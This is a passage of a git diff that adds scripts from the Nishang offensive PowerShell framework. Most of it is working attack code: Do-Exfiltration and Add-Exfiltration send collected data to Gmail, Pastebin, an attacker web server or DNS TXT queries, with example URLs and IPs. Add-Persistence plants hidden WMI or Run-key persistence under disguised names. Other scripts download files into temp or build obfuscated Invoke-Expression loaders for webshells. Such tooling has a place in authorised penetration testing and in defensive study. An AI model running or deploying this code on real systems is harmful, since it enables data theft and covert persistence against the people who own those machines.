PS > Add-Exfiltration -ScriptPath C:\Get-Information.ps1 -FilePath C:\test\Get-Information_exfil.ps1
|
||||||
|
|
||||||
|
PS > . .\Get-Information_exfil.ps1
|
||||||
|
|
||||||
|
PS > Get-Information | Do-Exfiltration -ExfilOption webserver -URL http://yourwebserver.com
|
||||||
|
|
||||||
|
The first command adds exfiltration to Get-Information.ps1 and writes it to Get-Information_exfil.ps1
|
||||||
|
|
||||||
|
The second command loads the generated Get-Information_exfil.ps1.
|
||||||
|
|
||||||
|
The third command runs the Get-Information function and pipes its output to the Do-Exfiltration function.
|
||||||
|
|
||||||
|
See the help of Do-Exfiltraion.ps1 to understand varios options for exfiltration.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
function Add-Exfiltration
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param (
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ScriptPath,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$FilePath
|
||||||
|
)
|
||||||
|
|
||||||
|
$Exfiltration = @'
|
||||||
|
function Do-Exfiltration
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
|
||||||
|
[String]
|
||||||
|
$Data,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$dev_key,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$username,
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$password,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$URL,
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$DomainName,
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$AuthNS
|
||||||
|
)
|
||||||
|
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $Data)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
$pastename = "Exfiltrated Data"
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = "Exfiltrated Data"
|
||||||
|
$msg.Body = $Data
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$code = Compress-Encode
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
||||||
|
'@
|
||||||
|
$ScriptContent = Get-Content $ScriptPath
|
||||||
|
Out-File -InputObject $ScriptContent -FilePath "$Filepath"
|
||||||
|
Out-File -InputObject $Exfiltration -Append -FilePath "$Filepath"
|
||||||
|
}
|
62
aspx/nishang/Utility/Add-Persistence.ps1
Normal file
62
aspx/nishang/Utility/Add-Persistence.ps1
Normal file
|
@ -0,0 +1,62 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which could be used to add reboot persistence to a powershell script.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script accepts path of a script to which reboot persistence is to be added.
|
||||||
|
The target sript is dropped into the user's temp directory and either WMI permanent event consumer or Registry changes is used (based on privs) for persistence.
|
||||||
|
Persistence created using this script could be cleaned by using the Remove-Persistence.ps1 script in Nishang.
|
||||||
|
|
||||||
|
.PARAMETER ScriptPath
|
||||||
|
Path of the script to which persistence is to be added.
|
||||||
|
|
||||||
|
.Example
|
||||||
|
PS > Add-Persistence -ScriptPath C:\script.ps1
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/20/use-powershell-to-create-a-permanent-wmi-event-to-launch-a-vbscript.aspx
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Add-Persistence
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$ScriptPath
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
$body = Get-Content $ScriptPath
|
||||||
|
$modulename = $script:MyInvocation.MyCommand.Name
|
||||||
|
$name = "persist.vbs"
|
||||||
|
Out-File -InputObject $body -Force $env:TEMP\$modulename
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
$currentPrincipal = New-Object Security.Principal.WindowsPrincipal( [Security.Principal.WindowsIdentity]::GetCurrent())
|
||||||
|
if($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator) -eq $true)
|
||||||
|
{
|
||||||
|
$scriptpath = $env:TEMP
|
||||||
|
$scriptFileName = "$scriptpath\$name"
|
||||||
|
$filterNS = "root\cimv2"
|
||||||
|
$wmiNS = "root\subscription"
|
||||||
|
$query = @"
|
||||||
|
Select * from __InstanceCreationEvent within 30
|
||||||
|
where targetInstance isa 'Win32_LogonSession'
|
||||||
|
"@
|
||||||
|
$filterName = "WindowsSanity"
|
||||||
|
$filterPath = Set-WmiInstance -Class __EventFilter -Namespace $wmiNS -Arguments @{name=$filterName; EventNameSpace=$filterNS; QueryLanguage="WQL"; Query=$query}
|
||||||
|
$consumerPath = Set-WmiInstance -Class ActiveScriptEventConsumer -Namespace $wmiNS -Arguments @{name="WindowsSanity"; ScriptFileName=$scriptFileName; ScriptingEngine="VBScript"}
|
||||||
|
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace $wmiNS -arguments @{Filter=$filterPath; Consumer=$consumerPath} | out-null
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
|
||||||
|
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
|
||||||
|
echo "objShell.run(`"powershell -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
57
aspx/nishang/Utility/Base64ToString.ps1
Normal file
57
aspx/nishang/Utility/Base64ToString.ps1
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script which decodes a base64 string to readable.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload decodes a base64 string to readable.
|
||||||
|
|
||||||
|
.PARAMETER Base64Strfile
|
||||||
|
The filename which contains base64 string to be decoded. Default is "decoded.txt" in the current working directory.
|
||||||
|
Use the parameter -IsString while using a string instead of file.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Base64ToString base64.txt
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Base64ToString dGVzdGVzdA== -IsString
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Base64ToString
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$Base64Strfile,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$outputfile=".\base64decoded.txt",
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$IsString
|
||||||
|
)
|
||||||
|
if($IsString -eq $true)
|
||||||
|
{
|
||||||
|
|
||||||
|
$base64string = [System.Convert]::FromBase64String($Base64Strfile)
|
||||||
|
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$base64string = [System.Convert]::FromBase64String((Get-Content $Base64Strfile))
|
||||||
|
}
|
||||||
|
|
||||||
|
$decodedstring = [System.Text.Encoding]::Unicode.GetString($base64string)
|
||||||
|
$decodedstring
|
||||||
|
Out-File -InputObject $decodedstring -Encoding ascii -FilePath "$outputfile"
|
||||||
|
Write-Output "Decoded data written to file $outputfile"
|
||||||
|
}
|
||||||
|
|
172
aspx/nishang/Utility/Do-Exfiltration.ps1
Normal file
172
aspx/nishang/Utility/Do-Exfiltration.ps1
Normal file
|
@ -0,0 +1,172 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Use this script to exfiltrate data from a target.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
|
||||||
|
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
|
||||||
|
in Utility folder of Nishang.
|
||||||
|
|
||||||
|
.PARAMETER Data
|
||||||
|
The data to be exfiltrated. Could be supplied by pipeline.
|
||||||
|
|
||||||
|
.PARAMETER ExfilOption
|
||||||
|
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
|
||||||
|
|
||||||
|
.PARAMETER dev_key
|
||||||
|
The Unique API key provided by pastebin when you register a free account.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER username
|
||||||
|
Username for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER password
|
||||||
|
Password for the pastebin/gmail account where data would be exfiltrated.
|
||||||
|
Unused for other options
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL of the webserver where POST requests would be sent.
|
||||||
|
|
||||||
|
.PARAMETER DomainName
|
||||||
|
The DomainName, whose subdomains would be used for sending TXT queries to.
|
||||||
|
|
||||||
|
.PARAMETER AuthNS
|
||||||
|
Authoritative Name Server for the domain specified in DomainName
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-Information | Do-Exfiltration -ExfilOption gmail -username <> -Password <>
|
||||||
|
|
||||||
|
Use above command for data exfiltration to gmail
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-Information | Do-Exfiltration -ExfilOption Webserver -URL http://192.168.254.183/catchpost.php
|
||||||
|
|
||||||
|
Use above command for data exfiltration to a webserver which logs POST requests.
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Get-Information | Do-Exfiltration -ExfilOption DNS -DomainName example.com -AuthNS 192.168.254.228
|
||||||
|
|
||||||
|
Use above command for data exfiltration to a DNS server which logs TXT queries.
|
||||||
|
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
function Do-Exfiltration
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
|
||||||
|
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
|
||||||
|
[String]
|
||||||
|
$Data,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
|
||||||
|
[String]
|
||||||
|
$ExfilOption,
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$dev_key,
|
||||||
|
|
||||||
|
[Parameter(Position = 3, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$username,
|
||||||
|
|
||||||
|
[Parameter(Position = 4, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$password,
|
||||||
|
|
||||||
|
[Parameter(Position = 5, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$URL,
|
||||||
|
|
||||||
|
[Parameter(Position = 6, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$DomainName,
|
||||||
|
|
||||||
|
[Parameter(Position = 7, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$AuthNS
|
||||||
|
)
|
||||||
|
|
||||||
|
function post_http($url,$parameters)
|
||||||
|
{
|
||||||
|
$http_request = New-Object -ComObject Msxml2.XMLHTTP
|
||||||
|
$http_request.open("POST", $url, $false)
|
||||||
|
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
|
||||||
|
$http_request.setRequestHeader("Content-length", $parameters.length);
|
||||||
|
$http_request.setRequestHeader("Connection", "close")
|
||||||
|
$http_request.send($parameters)
|
||||||
|
$script:session_key=$http_request.responseText
|
||||||
|
}
|
||||||
|
|
||||||
|
function Compress-Encode
|
||||||
|
{
|
||||||
|
#Compression logic from http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
$encdata = [string]::Join("`n", $Data)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($encdata)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
$Compressed
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($exfiloption -eq "pastebin")
|
||||||
|
{
|
||||||
|
$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
|
||||||
|
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
|
||||||
|
$pastename = "Exfiltrated Data"
|
||||||
|
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
|
||||||
|
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "gmail")
|
||||||
|
{
|
||||||
|
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
|
||||||
|
$smtpserver = “smtp.gmail.com”
|
||||||
|
$msg = new-object Net.Mail.MailMessage
|
||||||
|
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
|
||||||
|
$smtp.EnableSsl = $True
|
||||||
|
$smtp.Credentials = New-Object System.Net.NetworkCredential(“$username”, “$password”);
|
||||||
|
$msg.From = “$username@gmail.com”
|
||||||
|
$msg.To.Add(”$username@gmail.com”)
|
||||||
|
$msg.Subject = "Exfiltrated Data"
|
||||||
|
$msg.Body = $Data
|
||||||
|
if ($filename)
|
||||||
|
{
|
||||||
|
$att = new-object Net.Mail.Attachment($filename)
|
||||||
|
$msg.Attachments.Add($att)
|
||||||
|
}
|
||||||
|
$smtp.Send($msg)
|
||||||
|
}
|
||||||
|
|
||||||
|
elseif ($exfiloption -eq "webserver")
|
||||||
|
{
|
||||||
|
$Data = Compress-Encode
|
||||||
|
post_http $URL $Data
|
||||||
|
}
|
||||||
|
elseif ($ExfilOption -eq "DNS")
|
||||||
|
{
|
||||||
|
$code = Compress-Encode
|
||||||
|
$queries = [int]($code.Length/63)
|
||||||
|
while ($queries -ne 0)
|
||||||
|
{
|
||||||
|
$querystring = $code.Substring($lengthofsubstr,63)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $querystring.$DomainName $AuthNS"
|
||||||
|
$lengthofsubstr += 63
|
||||||
|
$queries -= 1
|
||||||
|
}
|
||||||
|
$mod = $code.Length%63
|
||||||
|
$query = $code.Substring($code.Length - $mod, $mod)
|
||||||
|
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
|
||||||
|
|
||||||
|
}
|
||||||
|
|
||||||
|
}
|
36
aspx/nishang/Utility/Download.ps1
Normal file
36
aspx/nishang/Utility/Download.ps1
Normal file
|
@ -0,0 +1,36 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang Payload to download a file in current users temp directory.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This payload downloads a file to the given location.
|
||||||
|
|
||||||
|
.PARAMETER URL
|
||||||
|
The URL from where the file would be downloaded.
|
||||||
|
|
||||||
|
.PARAMETER FileName
|
||||||
|
Name of the file where download would be saved.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > Download http://example.com/file.txt newfile.txt
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://labofapenetrationtester.blogspot.com/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function Download
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$URL,
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$FileName
|
||||||
|
)
|
||||||
|
$webclient = New-Object System.Net.WebClient
|
||||||
|
$file = "$env:temp\$FileName"
|
||||||
|
$webclient.DownloadFile($URL,"$file")
|
||||||
|
}
|
37
aspx/nishang/Utility/ExetoText.ps1
Normal file
37
aspx/nishang/Utility/ExetoText.ps1
Normal file
|
@ -0,0 +1,37 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Nishang script to convert an executable to text file.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
This script converts and an executable to a text file.
|
||||||
|
|
||||||
|
.PARAMETER EXE
|
||||||
|
The path of the executable to be converted.
|
||||||
|
|
||||||
|
.PARAMETER FileName
|
||||||
|
Path of the text file to which executable will be converted.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
PS > ExetoText evil.exe evil.txt
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://www.exploit-monday.com/2011/09/dropping-executables-with-powershell.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
function ExetoText
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$EXE,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$Filename
|
||||||
|
)
|
||||||
|
[byte[]] $hexdump = get-content -encoding byte -path "$EXE"
|
||||||
|
[System.IO.File]::WriteAllLines($Filename, ([string]$hexdump))
|
||||||
|
Write-Output "Converted file written to $Filename"
|
||||||
|
}
|
72
aspx/nishang/Utility/Invoke-Decode.ps1
Normal file
72
aspx/nishang/Utility/Invoke-Decode.ps1
Normal file
|
@ -0,0 +1,72 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Script for Nishang to decode the data encoded by Invoke-Encode, DNS TXT and POST exfiltration methods.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
The script asks for an encoded string as an option, decodes it and writes to a file "decoded.txt" in the current working directory.
|
||||||
|
Both the encoding and decoding is based on the code by ikarstein.
|
||||||
|
|
||||||
|
.PARAMETER EncodedData
|
||||||
|
The path of the file to be decoded. Use with -IsString to enter a string.
|
||||||
|
|
||||||
|
|
||||||
|
.PARAMETER OutputFilePath
|
||||||
|
The path of the output file. Default is "decoded.txt" in the current working directory.
|
||||||
|
|
||||||
|
.PARAMETER IsString
|
||||||
|
Use this to specify if you are passing a string ins place of a filepath.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Invoke-Decode -EncodedData C:\files\encoded.txt
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Invoke-Decode K07MLUosSSzOyM+OycvMzsjM4eUCAA== -IsString
|
||||||
|
|
||||||
|
Use above to decode a string.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Invoke-Decode
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$EncodedData,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$OutputFilePath = ".\decoded.txt",
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$IsString
|
||||||
|
)
|
||||||
|
|
||||||
|
if($IsString -eq $true)
|
||||||
|
{
|
||||||
|
|
||||||
|
$data = $EncodedData
|
||||||
|
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$data = Get-Content $EncodedData -Encoding UTF8
|
||||||
|
}
|
||||||
|
$dec = [System.Convert]::FromBase64String($data)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$ms.Write($dec, 0, $dec.Length)
|
||||||
|
$ms.Seek(0,0) | Out-Null
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Decompress)
|
||||||
|
$sr = New-Object System.IO.StreamReader($cs)
|
||||||
|
$output = $sr.readtoend()
|
||||||
|
$output
|
||||||
|
Out-File -InputObject $output -FilePath $OutputFilePath
|
||||||
|
Write-Host "Decode data written to $OutputFilePath"
|
||||||
|
}
|
110
aspx/nishang/Utility/Invoke-Encode.ps1
Normal file
110
aspx/nishang/Utility/Invoke-Encode.ps1
Normal file
|
@ -0,0 +1,110 @@
|
||||||
|
<#
|
||||||
|
.SYNOPSIS
|
||||||
|
Script for Nishang to encode and compress plain data.
|
||||||
|
|
||||||
|
.DESCRIPTION
|
||||||
|
The script asks for a path to a plain file, encodes it and writes to a file "encoded.txt" in the current working directory.
|
||||||
|
If the switch OutCommand is used. An encoded command which could be executed on a powershell console is also generated.
|
||||||
|
The encoded command is useful in case of non-interactive shells like webshell or when special characters in scripts may
|
||||||
|
create problems, for example, a meterpreter session.
|
||||||
|
|
||||||
|
.PARAMETER DataToEncode
|
||||||
|
The path of the file to be decoded. Use with -IsString to enter a string.
|
||||||
|
|
||||||
|
.PARAMETER OutputFilePath
|
||||||
|
The path of the output file. Default is "encoded.txt" in the current working directory.
|
||||||
|
|
||||||
|
.PARAMETER OutputCommandFilePath
|
||||||
|
The path of the output file where encoded command would be written. Default is "encodedcommand.txt" in the current working directory.
|
||||||
|
|
||||||
|
.PARAMETER IsString
|
||||||
|
Use this to specify if you are passing a string ins place of a filepath.
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt -OutCommand
|
||||||
|
|
||||||
|
Use above command to generate encoded data and encoded command which could be used on powershell console.
|
||||||
|
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Invoke-Encode -DataToEncode C:\files\encoded.txt
|
||||||
|
|
||||||
|
.EXAMPLE
|
||||||
|
|
||||||
|
PS > Invoke-Encode Get-Process -IsString
|
||||||
|
|
||||||
|
Use above to decode a string.
|
||||||
|
|
||||||
|
.LINK
|
||||||
|
http://blog.karstein-consulting.com/2010/10/19/how-to-embedd-compressed-scripts-in-other-powershell-scripts/
|
||||||
|
http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
|
||||||
|
https://github.com/samratashok/nishang
|
||||||
|
|
||||||
|
#>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
function Invoke-Encode
|
||||||
|
{
|
||||||
|
[CmdletBinding()] Param(
|
||||||
|
[Parameter(Position = 0, Mandatory = $True)]
|
||||||
|
[String]
|
||||||
|
$DataToEncode,
|
||||||
|
|
||||||
|
[Parameter(Position = 1, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$OutputFilePath = ".\encoded.txt",
|
||||||
|
|
||||||
|
[Parameter(Position = 2, Mandatory = $False)]
|
||||||
|
[String]
|
||||||
|
$OutputCommandFilePath = ".\encodedcommand.txt",
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$OutCommand,
|
||||||
|
|
||||||
|
[Switch]
|
||||||
|
$IsString
|
||||||
|
)
|
||||||
|
if($IsString -eq $true)
|
||||||
|
{
|
||||||
|
|
||||||
|
$Enc = $DataToEncode
|
||||||
|
|
||||||
|
}
|
||||||
|
else
|
||||||
|
{
|
||||||
|
$Enc = Get-Content $DataToEncode -Encoding UTF8
|
||||||
|
}
|
||||||
|
|
||||||
|
$data = [string]::Join("`n", $Enc)
|
||||||
|
$ms = New-Object System.IO.MemoryStream
|
||||||
|
$cs = New-Object System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMode]::Compress)
|
||||||
|
$sw = New-Object System.IO.StreamWriter($cs)
|
||||||
|
$sw.Write($data)
|
||||||
|
$sw.Close();
|
||||||
|
$Compressed = [Convert]::ToBase64String($ms.ToArray())
|
||||||
|
Write-Verbose $Compressed
|
||||||
|
Out-File -InputObject $Compressed -FilePath $OutputFilePath
|
||||||
|
Write-Output "Encoded data written to $OutputFilePath"
|
||||||
|
|
||||||
|
if ($OutCommand -eq $True)
|
||||||
|
{
|
||||||
|
#http://www.darkoperator.com/blog/2013/3/21/powershell-basics-execution-policy-and-code-signing-part-2.html
|
||||||
|
$command = "Invoke-Expression `$(New-Object IO.StreamReader (" +
|
||||||
|
|
||||||
|
"`$(New-Object IO.Compression.GZipStream (" +
|
||||||
|
|
||||||
|
"`$(New-Object IO.MemoryStream (,"+
|
||||||
|
|
||||||
|
"`$([Convert]::FromBase64String('$Compressed')))), " +
|
||||||
|
|
||||||
|
"[IO.Compression.CompressionMode]::Decompress)),"+
|
||||||
|
|
||||||
|
" [Text.Encoding]::ASCII)).ReadToEnd();"
|
